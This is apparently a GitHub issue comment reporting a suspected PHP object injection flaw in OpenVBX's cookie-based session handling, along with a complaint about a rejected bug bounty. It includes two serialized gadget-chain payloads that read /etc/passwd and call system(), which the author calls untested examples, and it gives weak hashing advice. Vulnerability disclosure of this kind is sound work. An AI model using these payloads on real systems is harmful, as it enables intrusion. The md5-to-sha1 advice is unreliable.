devcoinfet
commented
5 years ago I am actually seeing far more than those two i think are controllable sinks i am requesting you guys do a review of your code and let me know if this is exploitable me and a friend are setting up a lab to find out but either way your customers need to know this is possibly wrong
1.)function sess_destroy() 2.)function _set_cookie($cookie_data = NULL)
https://github.com/twilio/OpenVBX/blob/7ed912adfc80aa7c5294cc47ebefb11b91ca6c6f/system/libraries/Session.php
Both make calls to a serialize function that appears controllable with a payload like this
attack_one = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"memcached";O:17:"CodeIgniter\Model":5:{s:10:"builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"primaryKey";N;s:15:"beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:3:"cat";}}}s:13:"validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:11:"/etc/passwd";}}"""
attack_two = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"memcached";O:17:"CodeIgniter\Model":5:{s:10:"builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"primaryKey";N;s:15:"beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:6:"system";}}}s:13:"validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:2:"id";}}"""
not exact and may need tweaking just examples
========================================================================
Impact
encryption is off by default You are using what appears to be an md5 to verify the data was not modified like a csrf token
what happens is you call _unserialize and for some reason decide to overload an insecure function by not securing it but just checking it
than deciding to add an md5 to the end to verify it isn't tainted well with the original request intercepted we can now sign the md5
and attempt to execute a php object injection attack.
suggestions
Never use a collidable hash like md5 to generate a nonce
use something like sha1 and try to implement encryption by default with a random seed and make it diff for all
never store critical data client side in an effort to save yourself resources like you guys did with openvbx
and never trust any data that is provided by a user ever.
protected function _serialize($data) { if (!is_scalar($data)) { $data = serialize($data);-> right here your overloading an insecure function with an insecure function in php this is very dangerous } return $data; }
Also kindly tell me why this was rejected as a paying bounty on bug crowd for me and its an rce against one of your products with 200 plus customers?
FYI you bugcrowd team also said they weren't patching it is this standard practice to not pay for rce bounties when customers are using it i'm confused as well as at least patch it I mean You guys completely hid the fact I even reported it since it didn't fall under your program i am legally able to call you out on it here inf front of your customers.
I am not trying to be rude etc but I do what I do and barely get paid for it I dont take kindly to companies saying were not patching it and were not paying and we could care less people like me do care you have 200 customers out there possibly vulnerable and this was completely dismissed and in fact could be very serious.